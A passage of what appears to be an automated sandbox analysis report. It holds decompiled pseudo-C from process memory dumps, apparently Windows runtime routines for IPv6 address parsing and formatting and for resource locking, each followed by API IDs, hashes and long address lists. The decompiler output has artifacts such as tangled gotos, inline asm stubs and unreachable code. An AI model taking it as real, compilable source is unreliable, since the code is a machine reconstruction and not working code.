                                                      						_t120 = E00A40CFA(_v28, 0, 0xa);
                                                      						_t183 = _t183 + 0xc;
                                                      						if(_t120 > 0xff) {
                                                      							goto L6;
                                                      						}
                                                      						 *((char*)(_t180 + _v20 * 2 + _a12)) = _t120;
                                                      						goto L47;
                                                      					}
                                                      					if(_v12 > 4) {
                                                      						goto L6;
                                                      					}
                                                      					_t121 = E00A40CFA(_v28, _t180, 0x10);
                                                      					_t183 = _t183 + 0xc;
                                                      					 *((short*)(_a12 + _v20 * 2)) = _t121;
                                                      					goto L47;
                                                      				} else {
                                                      					while(1) {
                                                      						_t123 = _v16;
                                                      						if(_t123 == 0) {
                                                      							goto L7;
                                                      						}
                                                      						_t108 = _t123 - 1;
                                                      						if(_t108 != 0) {
                                                      							goto L1;
                                                      						}
                                                      						_t178 = _t141;
                                                      						if(E00A406BA(_t108, _t141) == 0 || _t135 == 0) {
                                                      							if(E00A406BA(_t135, _t178) == 0 || E00A40A5B(_t136, _t178) == 0) {
                                                      								if(_t141 != 0x3a) {
                                                      									if(_t141 == 0x2e) {
                                                      										if(_a7 != 0 || _v24 > 2 || _v8 > 6) {
                                                      											goto L41;
                                                      										} else {
                                                      											_v24 = _v24 + 1;
                                                      											L27:
                                                      											_v16 = _v16 & 0x00000000;
                                                      											L28:
                                                      											if(_v28 == 0) {
                                                      												goto L20;
                                                      											}
                                                      											_t177 = _v24;
                                                      											if(_t177 != 0) {
                                                      												if(_v12 > 3) {
                                                      													L6:
                                                      													return 0xc000000d;
                                                      												}
                                                      												_t132 = E00A40CFA(_v28, 0, 0xa);
                                                      												_t183 = _t183 + 0xc;
                                                      												if(_t132 > 0xff) {
                                                      													goto L6;
                                                      												}
                                                      												 *((char*)(_t177 + _v20 * 2 + _a12 - 1)) = _t132;
                                                      												goto L20;
                                                      											}
                                                      											if(_v12 > 4) {
                                                      												goto L6;
                                                      											}
                                                      											_t133 = E00A40CFA(_v28, 0, 0x10);
                                                      											_t183 = _t183 + 0xc;
                                                      											_v20 = _v20 + 1;
                                                      											 *((short*)(_a12 + _v20 * 2)) = _t133;
                                                      											goto L20;
                                                      										}
                                                      									}
                                                      									goto L41;
                                                      								}
                                                      								if(_v24 > 0 || _v8 > 6) {
                                                      									goto L41;
                                                      								} else {
                                                      									_t130 = _t179 + 1;
                                                      									if( *_t130 == _t141) {
                                                      										if(_v32 != 0) {
                                                      											goto L41;
                                                      										}
                                                      										_v32 = _v8 + 1;
                                                      										_t156 = 2;
                                                      										_v8 = _v8 + _t156;
                                                      										L34:
                                                      										_t179 = _t130;
                                                      										_v16 = _t156;
                                                      										goto L28;
                                                      									}
                                                      									_v8 = _v8 + 1;
                                                      									goto L27;
                                                      								}
                                                      							} else {
                                                      								_v12 = _v12 + 1;
                                                      								if(_v24 > 0) {
                                                      									goto L41;
                                                      								}
                                                      								_a7 = 1;
                                                      								goto L20;
                                                      							}
                                                      						} else {
                                                      							_v12 = _v12 + 1;
                                                      							L20:
                                                      							_t179 = _t179 + 1;
                                                      							_t141 =  *_t179;
                                                      							if(_t141 == 0) {
                                                      								goto L41;
                                                      							}
                                                      							continue;
                                                      						}
                                                      						L7:
                                                      						if(_t141 == 0x3a) {
                                                      							if(_v24 > 0 || _v8 > 0) {
                                                      								goto L41;
                                                      							} else {
                                                      								_t130 = _t179 + 1;
                                                      								if( *_t130 != _t141) {
                                                      									goto L41;
                                                      								}
                                                      								_v20 = _v20 + 1;
                                                      								_t156 = 2;
                                                      								_v32 = 1;
                                                      								_v8 = _t156;
                                                      								 *((short*)(_a12 + _v20 * 2)) = 0;
                                                      								goto L34;
                                                      							}
                                                      						}
                                                      						L8:
                                                      						if(_v8 > 7) {
                                                      							goto L41;
                                                      						}
                                                      						_t142 = _t141;
                                                      						if(E00A406BA(_t123, _t141) == 0 || _t124 == 0) {
                                                      							if(E00A406BA(_t124, _t142) == 0 || E00A40A5B(_t125, _t142) == 0 || _v24 > 0) {
                                                      								goto L41;
                                                      							} else {
                                                      								_t128 = 1;
                                                      								_a7 = 1;
                                                      								_v28 = _t179;
                                                      								_v16 = 1;
                                                      								_v12 = 1;
                                                      								L39:
                                                      								if(_v16 == _t128) {
                                                      									goto L20;
                                                      								}
                                                      								goto L28;
                                                      							}
                                                      						} else {
                                                      							_a7 = 0;
                                                      							_v28 = _t179;
                                                      							_v16 = 1;
                                                      							_v12 = 1;
                                                      							goto L20;
                                                      						}
                                                      					}
                                                      				}
                                                      				L1:
                                                      				_t123 = _t108 == 1;
                                                      				if(_t108 == 1) {
                                                      					goto L8;
                                                      				}
                                                      				_t128 = 1;
                                                      				goto L39;
                                                      			}

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.692467198.00000000009F0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true
                                                      • Associated: 00000008.00000002.692459553.00000000009E0000.00000040.00000001.sdmp
                                                      • Associated: 00000008.00000002.692670851.0000000000AD0000.00000040.00000001.sdmp
                                                      • Associated: 00000008.00000002.692685212.0000000000AE0000.00000040.00000001.sdmp
                                                      • Associated: 00000008.00000002.692706344.0000000000AE4000.00000040.00000001.sdmp
                                                      • Associated: 00000008.00000002.692723406.0000000000AE7000.00000040.00000001.sdmp
                                                      • Associated: 00000008.00000002.692734354.0000000000AF0000.00000040.00000001.sdmp
                                                      • Associated: 00000008.00000002.693915836.0000000000B50000.00000040.00000001.sdmp
                                                      Similarity
                                                      • API ID: __fassign
                                                      • String ID: .$:$:
                                                      • API String ID: 3965848254-2308638275
                                                      • Opcode ID: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                      • Instruction ID: f214b70406de7362b1d73cde1ed0345798e7d126cc59d866e066e62151980aa1
                                                      • Opcode Fuzzy Hash: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                      • Instruction Fuzzy Hash: EDA1E179D0030ADFCF24DF64C880EBEB7B4EF95305F24856ADA42A7282D7349A41EB55
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 49%
                                                      			E00A40554(signed int _a4, char _a8) {
                                                      				void* __ebx;
                                                      				void* __edi;
                                                      				void* __esi;
                                                      				signed int* _t49;
                                                      				signed int _t51;
                                                      				signed int _t56;
                                                      				signed int _t58;
                                                      				signed int _t61;
                                                      				signed int _t63;
                                                      				void* _t66;
                                                      				intOrPtr _t67;
                                                      				signed int _t70;
                                                      				void* _t75;
                                                      				signed int _t81;
                                                      				signed int _t84;
                                                      				void* _t86;
                                                      				signed int _t93;
                                                      				signed int _t96;
                                                      				intOrPtr _t105;
                                                      				signed int _t107;
                                                      				void* _t110;
                                                      				signed int _t115;
                                                      				signed int* _t119;
                                                      				void* _t125;
                                                      				void* _t126;
                                                      				signed int _t128;
                                                      				signed int _t130;
                                                      				signed int _t138;
                                                      				signed int _t144;
                                                      				void* _t158;
                                                      				void* _t159;
                                                      				void* _t160;
                                                      
                                                      				_t96 = _a4;
                                                      				_t115 =  *(_t96 + 0x28);
                                                      				_push(_t138);
                                                      				if(_t115 < 0) {
                                                      					_t105 =  *[fs:0x18];
                                                      					__eflags =  *((intOrPtr*)(_t96 + 0x2c)) -  *((intOrPtr*)(_t105 + 0x24));
                                                      					if( *((intOrPtr*)(_t96 + 0x2c)) !=  *((intOrPtr*)(_t105 + 0x24))) {
                                                      						goto L6;
                                                      					} else {
                                                      						__eflags = _t115 | 0xffffffff;
                                                      						asm("lock xadd [eax], edx");
                                                      						return 1;
                                                      					}
                                                      				} else {
                                                      					L6:
                                                      					_push(_t128);
                                                      					while(1) {
                                                      						L7:
                                                      						__eflags = _t115;
                                                      						if(_t115 >= 0) {
                                                      							break;
                                                      						}
                                                      						__eflags = _a8;
                                                      						if(_a8 == 0) {
                                                      							__eflags = 0;
                                                      							return 0;
                                                      						} else {
                                                      							 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
                                                      							_t49 = _t96 + 0x1c;
                                                      							_t106 = 1;
                                                      							asm("lock xadd [edx], ecx");
                                                      							_t115 =  *(_t96 + 0x28);
                                                      							__eflags = _t115;
                                                      							if(_t115 < 0) {
                                                      								L23:
                                                      								_t130 = 0;
                                                      								__eflags = 0;
                                                      								while(1) {
                                                      									_t118 =  *(_t96 + 0x30) & 0x00000001;
                                                      									asm("sbb esi, esi");
                                                      									_t144 =  !( ~( *(_t96 + 0x30) & 1)) & 0x00ae01c0;
                                                      									_push(_t144);
                                                      									_push(0);
                                                      									_t51 = E009FF8CC( *((intOrPtr*)(_t96 + 0x18)));
                                                      									__eflags = _t51 - 0x102;
                                                      									if(_t51 != 0x102) {
                                                      										break;
                                                      									}
                                                      									_t106 =  *(_t144 + 4);
                                                      									_t126 =  *_t144;
                                                      									_t86 = E00A44FC0(_t126,  *(_t144 + 4), 0xff676980, 0xffffffff);
                                                      									_push(_t126);
                                                      									_push(_t86);
                                                      									E00A53F92(0x65, 0, "RTL: Acquire Shared Sem Timeout %d(%I64u secs)\n", _t130);
                                                      									E00A53F92(0x65, 0, "RTL: Resource at %p\n", _t96);
                                                      									_t130 = _t130 + 1;
                                                      									_t160 = _t158 + 0x28;
                                                      									__eflags = _t130 - 2;
                                                      									if(__eflags > 0) {
                                                      										E00A8217A(_t106, __eflags, _t96);
                                                      									}
                                                      									_push("RTL: Re-Waiting\n");
                                                      									_push(0);
                                                      									_push(0x65);
                                                      									E00A53F92();
                                                      									_t158 = _t160 + 0xc;
                                                      								}
                                                      								__eflags = _t51;
                                                      								if(__eflags < 0) {
                                                      									_push(_t51);
                                                      									E00A43915(_t96, _t106, _t118, _t130, _t144, __eflags);
                                                      									asm("int3");
                                                      									while(1) {
                                                      										L32:
                                                      										__eflags = _a8;
                                                      										if(_a8 == 0) {
                                                      											break;
                                                      										}
                                                      										 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
                                                      										_t119 = _t96 + 0x24;
                                                      										_t107 = 1;
                                                      										asm("lock xadd [eax], ecx");
                                                      										_t56 =  *(_t96 + 0x28);
                                                      										_a4 = _t56;
                                                      										__eflags = _t56;
                                                      										if(_t56 != 0) {
                                                      											L40:
                                                      											_t128 = 0;
                                                      											__eflags = 0;
                                                      											while(1) {
                                                      												_t121 =  *(_t96 + 0x30) & 0x00000001;
                                                      												asm("sbb esi, esi");
                                                      												_t138 =  !( ~( *(_t96 + 0x30) & 1)) & 0x00ae01c0;
                                                      												_push(_t138);
                                                      												_push(0);
                                                      												_t58 = E009FF8CC( *((intOrPtr*)(_t96 + 0x20)));
                                                      												__eflags = _t58 - 0x102;
                                                      												if(_t58 != 0x102) {
                                                      													break;
                                                      												}
                                                      												_t107 =  *(_t138 + 4);
                                                      												_t125 =  *_t138;
                                                      												_t75 = E00A44FC0(_t125, _t107, 0xff676980, 0xffffffff);
                                                      												_push(_t125);
                                                      												_push(_t75);
                                                      												E00A53F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t128);
                                                      												E00A53F92(0x65, 0, "RTL: Resource at %p\n", _t96);
                                                      												_t128 = _t128 + 1;
                                                      												_t159 = _t158 + 0x28;
                                                      												__eflags = _t128 - 2;
                                                      												if(__eflags > 0) {
                                                      													E00A8217A(_t107, __eflags, _t96);
                                                      												}
                                                      												_push("RTL: Re-Waiting\n");
                                                      												_push(0);
                                                      												_push(0x65);
                                                      												E00A53F92();
                                                      												_t158 = _t159 + 0xc;
                                                      											}
                                                      											__eflags = _t58;
                                                      											if(__eflags < 0) {
                                                      												_push(_t58);
                                                      												E00A43915(_t96, _t107, _t121, _t128, _t138, __eflags);
                                                      												asm("int3");
                                                      												_t61 =  *_t107;
                                                      												 *_t107 = 0;
                                                      												__eflags = _t61;
                                                      												if(_t61 == 0) {
                                                      													L1:
                                                      													_t63 = E00A25384(_t138 + 0x24);
                                                      													if(_t63 != 0) {
                                                      														goto L52;
                                                      													} else {
                                                      														goto L2;
                                                      													}
                                                      												} else {
                                                      													_t123 =  *((intOrPtr*)(_t138 + 0x18));
                                                      													_push( &_a4);
                                                      													_push(_t61);
                                                      													_t70 = E009FF970( *((intOrPtr*)(_t138 + 0x18)));
                                                      													__eflags = _t70;
                                                      													if(__eflags >= 0) {
                                                      														goto L1;
                                                      													} else {
                                                      														_push(_t70);
                                                      														E00A43915(_t96,  &_a4, _t123, _t128, _t138, __eflags);
                                                      														L52:
                                                      														_t122 =  *((intOrPtr*)(_t138 + 0x20));
                                                      														_push( &_a4);
                                                      														_push(1);
                                                      														_t63 = E009FF970( *((intOrPtr*)(_t138 + 0x20)));
                                                      														__eflags = _t63;
                                                      														if(__eflags >= 0) {
                                                      															L2:
                                                      															return _t63;
                                                      														} else {
                                                      															_push(_t63);
                                                      															E00A43915(_t96,  &_a4, _t122, _t128, _t138, __eflags);
                                                      															_t109 =  *((intOrPtr*)(_t138 + 0x20));
                                                      															_push( &_a4);
                                                      															_push(1);
                                                      															_t63 = E009FF970( *((intOrPtr*)(_t138 + 0x20)));
                                                      															__eflags = _t63;
                                                      															if(__eflags >= 0) {
                                                      																goto L2;
                                                      															} else {
                                                      																_push(_t63);
                                                      																_t66 = E00A43915(_t96, _t109, _t122, _t128, _t138, __eflags);
                                                      																asm("int3");
                                                      																while(1) {
                                                      																	_t110 = _t66;
                                                      																	__eflags = _t66 - 1;
                                                      																	if(_t66 != 1) {
                                                      																		break;
                                                      																	}
                                                      																	_t128 = _t128 | 0xffffffff;
                                                      																	_t66 = _t110;
                                                      																	asm("lock cmpxchg [ebx], edi");
                                                      																	__eflags = _t66 - _t110;
                                                      																	if(_t66 != _t110) {
                                                      																		continue;
                                                      																	} else {
                                                      																		_t67 =  *[fs:0x18];
                                                      																		 *((intOrPtr*)(_t138 + 0x2c)) =  *((intOrPtr*)(_t67 + 0x24));
                                                      																		return _t67;
                                                      																	}
                                                      																	goto L58;
                                                      																}
                                                      																E00A25329(_t110, _t138);
                                                      																return E00A253A5(_t138, 1);
                                                      															}
                                                      														}
                                                      													}
                                                      												}
                                                      											} else {
                                                      												_t56 =  *(_t96 + 0x28);
                                                      												goto L3;
                                                      											}
                                                      										} else {
                                                      											_t107 =  *_t119;
                                                      											__eflags = _t107;
                                                      											if(__eflags > 0) {
                                                      												while(1) {
                                                      													_t81 = _t107;
                                                      													asm("lock cmpxchg [edi], esi");
                                                      													__eflags = _t81 - _t107;
                                                      													if(_t81 == _t107) {
                                                      														break;
                                                      													}
                                                      													_t107 = _t81;
                                                      													__eflags = _t81;
                                                      													if(_t81 > 0) {
                                                      														continue;
                                                      													}
                                                      													break;
                                                      												}
                                                      												_t56 = _a4;
                                                      												__eflags = _t107;
                                                      											}
                                                      											if(__eflags != 0) {
                                                      												while(1) {
                                                      													L3:
                                                      													__eflags = _t56;
                                                      													if(_t56 != 0) {
                                                      														goto L32;
                                                      													}
                                                      													_t107 = _t107 | 0xffffffff;
                                                      													_t56 = 0;
                                                      													asm("lock cmpxchg [edx], ecx");
                                                      													__eflags = 0;
                                                      													if(0 != 0) {
                                                      														continue;
                                                      													} else {
                                                      														 *((intOrPtr*)(_t96 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
                                                      														return 1;
                                                      													}
                                                      													goto L58;
                                                      												}
                                                      												continue;
                                                      											} else {
                                                      												goto L40;
                                                      											}
                                                      										}
                                                      										goto L58;
                                                      									}
                                                      									__eflags = 0;
                                                      									return 0;
                                                      								} else {
                                                      									_t115 =  *(_t96 + 0x28);
                                                      									continue;
                                                      								}
                                                      							} else {
                                                      								_t106 =  *_t49;
                                                      								__eflags = _t106;
                                                      								if(__eflags > 0) {
                                                      									while(1) {
                                                      										_t93 = _t106;
                                                      										asm("lock cmpxchg [edi], esi");
                                                      										__eflags = _t93 - _t106;
                                                      										if(_t93 == _t106) {
                                                      											break;
                                                      										}
                                                      										_t106 = _t93;
                                                      										__eflags = _t93;
                                                      										if(_t93 > 0) {
                                                      											continue;
                                                      										}
                                                      										break;
                                                      									}
                                                      									__eflags = _t106;
                                                      								}
                                                      								if(__eflags != 0) {
                                                      									continue;
                                                      								} else {
                                                      									goto L23;
                                                      								}
                                                      							}
                                                      						}
                                                      						goto L58;
                                                      					}
                                                      					_t84 = _t115;
                                                      					asm("lock cmpxchg [esi], ecx");
                                                      					__eflags = _t84 - _t115;
                                                      					if(_t84 != _t115) {
                                                      						_t115 = _t84;
                                                      						goto L7;
                                                      					} else {
                                                      						return 1;
                                                      					}
                                                      				}
                                                      				L58:
                                                      			}



































                                                      0x00a59166
                                                      0x00a59171
                                                      0x00a59176
                                                      0x00a59176
                                                      0x00000000
                                                      0x00a59160
                                                      0x00a623c6
                                                      0x00a623d7
                                                      0x00a623d7
                                                      0x00a623ad
                                                      0x00a62390
                                                      0x00a62373
                                                      0x00a6233f
                                                      0x00a6233f
                                                      0x00000000
                                                      0x00a6233f
                                                      0x00a62291
                                                      0x00a62291
                                                      0x00a62293
                                                      0x00a62295
                                                      0x00a6229a
                                                      0x00a622a1
                                                      0x00a622a3
                                                      0x00a622a7
                                                      0x00a622a9
                                                      0x00000000
                                                      0x00000000
                                                      0x00a622ab
                                                      0x00a622ad
                                                      0x00a622af
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00a622af
                                                      0x00a622b1
                                                      0x00a622b4
                                                      0x00a622b4
                                                      0x00a622b6
                                                      0x00a253be
                                                      0x00a253be
                                                      0x00a253be
                                                      0x00a253c0
                                                      0x00000000
                                                      0x00000000
                                                      0x00a253cb
                                                      0x00a253ce
                                                      0x00a253d0
                                                      0x00a253d4
                                                      0x00a253d6
                                                      0x00000000
                                                      0x00a253d8
                                                      0x00a253e3
                                                      0x00a253ea
                                                      0x00a253ea
                                                      0x00000000
                                                      0x00a253d6
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00a622b6
                                                      0x00000000
                                                      0x00a6228f
                                                      0x00a62349
                                                      0x00a6234d
                                                      0x00a62251
                                                      0x00a62251
                                                      0x00000000
                                                      0x00a62251
                                                      0x00a621a4
                                                      0x00a621a4
                                                      0x00a621a6
                                                      0x00a621a8
                                                      0x00a621ac
                                                      0x00a621b6
                                                      0x00a621b8
                                                      0x00a621bc
                                                      0x00a621be
                                                      0x00000000
                                                      0x00000000
                                                      0x00a621c0
                                                      0x00a621c2
                                                      0x00a621c4
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00a621c4
                                                      0x00a621c6
                                                      0x00a621c6
                                                      0x00a621c8
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00a621c8
                                                      0x00a621a2
                                                      0x00000000
                                                      0x00a62183
                                                      0x00a4057b
                                                      0x00a4057d
                                                      0x00a40581
                                                      0x00a40583
                                                      0x00a62178
                                                      0x00000000
                                                      0x00a40589
                                                      0x00a4058f
                                                      0x00a4058f
                                                      0x00a40583
                                                      0x00000000

                                                      APIs
                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00A62206
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.692467198.00000000009F0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true
                                                      • Associated: 00000008.00000002.692459553.00000000009E0000.00000040.00000001.sdmp
                                                      • Associated: 00000008.00000002.692670851.0000000000AD0000.00000040.00000001.sdmp
                                                      • Associated: 00000008.00000002.692685212.0000000000AE0000.00000040.00000001.sdmp
                                                      • Associated: 00000008.00000002.692706344.0000000000AE4000.00000040.00000001.sdmp
                                                      • Associated: 00000008.00000002.692723406.0000000000AE7000.00000040.00000001.sdmp
                                                      • Associated: 00000008.00000002.692734354.0000000000AF0000.00000040.00000001.sdmp
                                                      • Associated: 00000008.00000002.693915836.0000000000B50000.00000040.00000001.sdmp
                                                      Similarity
                                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                      • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                      • API String ID: 885266447-4236105082
                                                      • Opcode ID: 781a1b69360d6f49643acbc4a775e0451bde6af0257712ca7202d246bd272aa8
                                                      • Instruction ID: f510b12933ad2fa97dbec47dec43746e63c9951263ebfc88f77ee9bb51981f30
                                                      • Opcode Fuzzy Hash: 781a1b69360d6f49643acbc4a775e0451bde6af0257712ca7202d246bd272aa8
                                                      • Instruction Fuzzy Hash: EE513776B046016BEB148B28CC81FA633B9AFD8721F218229FD19DF285DA71EC458790
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 64%
                                                      			E00A414C0(void* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr* _a20) {
                                                      				signed int _v8;
                                                      				char _v10;
                                                      				char _v140;
                                                      				void* __ebx;
                                                      				void* __edi;
                                                      				void* __esi;
                                                      				signed int _t24;
                                                      				void* _t26;
                                                      				signed int _t29;
                                                      				signed int _t34;
                                                      				signed int _t40;
                                                      				intOrPtr _t45;
                                                      				void* _t51;
                                                      				intOrPtr* _t52;
                                                      				void* _t54;
                                                      				signed int _t57;
                                                      				void* _t58;
                                                      
                                                      				_t51 = __edx;
                                                      				_t24 =  *0xae2088; // 0x7663e5d0
                                                      				_v8 = _t24 ^ _t57;
                                                      				_t45 = _a16;
                                                      				_t53 = _a4;
                                                      				_t52 = _a20;
                                                      				if(_a4 == 0 || _t52 == 0) {
                                                      					L10:
                                                      					_t26 = 0xc000000d;
                                                      				} else {
                                                      					if(_t45 == 0) {
                                                      						if( *_t52 == _t45) {
                                                      							goto L3;
                                                      						} else {
                                                      							goto L10;
                                                      						}
                                                      					} else {
                                                      						L3:
                                                      						_t28 =  &_v140;
                                                      						if(_a12 != 0) {
                                                      							_push("[");
                                                      							_push(0x41);
                                                      							_push( &_v140);
                                                      							_t29 = E00A37707();
                                                      							_t58 = _t58 + 0xc;
                                                      							_t28 = _t57 + _t29 * 2 - 0x88;
                                                      						}
                                                      						_t54 = E00A413CB(_t53, _t28);
                                                      						if(_a8 != 0) {
                                                      							_t34 = E00A37707(_t54,  &_v10 - _t54 >> 1, L"%%%u", _a8);
                                                      							_t58 = _t58 + 0x10;
                                                      							_t54 = _t54 + _t34 * 2;
                                                      						}
                                                      						if(_a12 != 0) {
                                                      							_t40 = E00A37707(_t54,  &_v10 - _t54 >> 1, L"]:%u", _a12 & 0x0000ffff);
                                                      							_t58 = _t58 + 0x10;
                                                      							_t54 = _t54 + _t40 * 2;
                                                      						}
                                                      						_t53 = (_t54 -  &_v140 >> 1) + 1;
                                                      						 *_t52 = _t53;
                                                      						if( *_t52 < _t53) {
                                                      							goto L10;
                                                      						} else {
                                                      							E00A02340(_t45,  &_v140, _t53 + _t53);
                                                      							_t26 = 0;
                                                      						}
                                                      					}
                                                      				}
                                                      				return E00A0E1B4(_t26, _t45, _v8 ^ _t57, _t51, _t52, _t53);
                                                      			}

                                                      APIs
                                                      • ___swprintf_l.LIBCMT ref: 00A6EA22
                                                        • Part of subcall function 00A413CB: ___swprintf_l.LIBCMT ref: 00A4146B
                                                        • Part of subcall function 00A413CB: ___swprintf_l.LIBCMT ref: 00A41490
                                                      • ___swprintf_l.LIBCMT ref: 00A4156D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.692467198.00000000009F0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true
                                                      • Associated: 00000008.00000002.692459553.00000000009E0000.00000040.00000001.sdmp
                                                      • Associated: 00000008.00000002.692670851.0000000000AD0000.00000040.00000001.sdmp
                                                      • Associated: 00000008.00000002.692685212.0000000000AE0000.00000040.00000001.sdmp
                                                      • Associated: 00000008.00000002.692706344.0000000000AE4000.00000040.00000001.sdmp
                                                      • Associated: 00000008.00000002.692723406.0000000000AE7000.00000040.00000001.sdmp
                                                      • Associated: 00000008.00000002.692734354.0000000000AF0000.00000040.00000001.sdmp
                                                      • Associated: 00000008.00000002.693915836.0000000000B50000.00000040.00000001.sdmp
                                                      Similarity
                                                      • API ID: ___swprintf_l
                                                      • String ID: %%%u$]:%u
                                                      • API String ID: 48624451-3050659472
                                                      • Opcode ID: 51a8652c59c22a7516413e0fb304eab5a58354704f8ea3c2f54e70480d0afc98
                                                      • Instruction ID: efdad50921c4c877daf2fb7c32043ae97c7b81124c2e442e3c97a1f6eb79cfab
                                                      • Opcode Fuzzy Hash: 51a8652c59c22a7516413e0fb304eab5a58354704f8ea3c2f54e70480d0afc98
                                                      • Instruction Fuzzy Hash: 2721A576900219ABCF20DF54DD45AEFB3BCBB90700F544555FC5AD3141EB70AA988BE1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 44%
                                                      			E00A253A5(signed int _a4, char _a8) {
                                                      				void* __ebx;
                                                      				void* __edi;
                                                      				void* __esi;
                                                      				signed int _t32;
                                                      				signed int _t37;
                                                      				signed int _t40;
                                                      				signed int _t42;
                                                      				void* _t45;
                                                      				intOrPtr _t46;
                                                      				signed int _t49;
                                                      				void* _t51;
                                                      				signed int _t57;
                                                      				signed int _t64;
                                                      				signed int _t71;
                                                      				void* _t74;
                                                      				intOrPtr _t78;
                                                      				signed int* _t79;
                                                      				void* _t85;
                                                      				signed int _t86;
                                                      				signed int _t92;
                                                      				void* _t104;
                                                      				void* _t105;
                                                      
                                                      				_t64 = _a4;
                                                      				_t32 =  *(_t64 + 0x28);
                                                      				_t71 = _t64 + 0x28;
                                                      				_push(_t92);
                                                      				if(_t32 < 0) {
                                                      					_t78 =  *[fs:0x18];
                                                      					__eflags =  *((intOrPtr*)(_t64 + 0x2c)) -  *((intOrPtr*)(_t78 + 0x24));
                                                      					if( *((intOrPtr*)(_t64 + 0x2c)) !=  *((intOrPtr*)(_t78 + 0x24))) {
                                                      						goto L3;
                                                      					} else {
                                                      						__eflags = _t32 | 0xffffffff;
                                                      						asm("lock xadd [ecx], eax");
                                                      						return 1;
                                                      					}
                                                      				} else {
                                                      					L3:
                                                      					_push(_t86);
                                                      					while(1) {
                                                      						L4:
                                                      						__eflags = _t32;
                                                      						if(_t32 == 0) {
                                                      							break;
                                                      						}
                                                      						__eflags = _a8;
                                                      						if(_a8 == 0) {
                                                      							__eflags = 0;
                                                      							return 0;
                                                      						} else {
                                                      							 *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) + 1;
                                                      							_t79 = _t64 + 0x24;
                                                      							_t71 = 1;
                                                      							asm("lock xadd [eax], ecx");
                                                      							_t32 =  *(_t64 + 0x28);
                                                      							_a4 = _t32;
                                                      							__eflags = _t32;
                                                      							if(_t32 != 0) {
                                                      								L19:
                                                      								_t86 = 0;
                                                      								__eflags = 0;
                                                      								while(1) {
                                                      									_t81 =  *(_t64 + 0x30) & 0x00000001;
                                                      									asm("sbb esi, esi");
                                                      									_t92 =  !( ~( *(_t64 + 0x30) & 1)) & 0x00ae01c0;
                                                      									_push(_t92);
                                                      									_push(0);
                                                      									_t37 = E009FF8CC( *((intOrPtr*)(_t64 + 0x20)));
                                                      									__eflags = _t37 - 0x102;
                                                      									if(_t37 != 0x102) {
                                                      										break;
                                                      									}
                                                      									_t71 =  *(_t92 + 4);
                                                      									_t85 =  *_t92;
                                                      									_t51 = E00A44FC0(_t85, _t71, 0xff676980, 0xffffffff);
                                                      									_push(_t85);
                                                      									_push(_t51);
                                                      									E00A53F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t86);
                                                      									E00A53F92(0x65, 0, "RTL: Resource at %p\n", _t64);
                                                      									_t86 = _t86 + 1;
                                                      									_t105 = _t104 + 0x28;
                                                      									__eflags = _t86 - 2;
                                                      									if(__eflags > 0) {
                                                      										E00A8217A(_t71, __eflags, _t64);
                                                      									}
                                                      									_push("RTL: Re-Waiting\n");
                                                      									_push(0);
                                                      									_push(0x65);
                                                      									E00A53F92();
                                                      									_t104 = _t105 + 0xc;
                                                      								}
                                                      								__eflags = _t37;
                                                      								if(__eflags < 0) {
                                                      									_push(_t37);
                                                      									E00A43915(_t64, _t71, _t81, _t86, _t92, __eflags);
                                                      									asm("int3");
                                                      									_t40 =  *_t71;
                                                      									 *_t71 = 0;
                                                      									__eflags = _t40;
                                                      									if(_t40 == 0) {
                                                      										L1:
                                                      										_t42 = E00A25384(_t92 + 0x24);
                                                      										if(_t42 != 0) {
                                                      											goto L31;
                                                      										} else {
                                                      											goto L2;
                                                      										}
                                                      									} else {
                                                      										_t83 =  *((intOrPtr*)(_t92 + 0x18));
                                                      										_push( &_a4);
                                                      										_push(_t40);
                                                      										_t49 = E009FF970( *((intOrPtr*)(_t92 + 0x18)));
                                                      										__eflags = _t49;
                                                      										if(__eflags >= 0) {
                                                      											goto L1;
                                                      										} else {
                                                      											_push(_t49);
                                                      											E00A43915(_t64,  &_a4, _t83, _t86, _t92, __eflags);
                                                      											L31:
                                                      											_t82 =  *((intOrPtr*)(_t92 + 0x20));
                                                      											_push( &_a4);
                                                      											_push(1);
                                                      											_t42 = E009FF970( *((intOrPtr*)(_t92 + 0x20)));
                                                      											__eflags = _t42;
                                                      											if(__eflags >= 0) {
                                                      												L2:
                                                      												return _t42;
                                                      											} else {
                                                      												_push(_t42);
                                                      												E00A43915(_t64,  &_a4, _t82, _t86, _t92, __eflags);
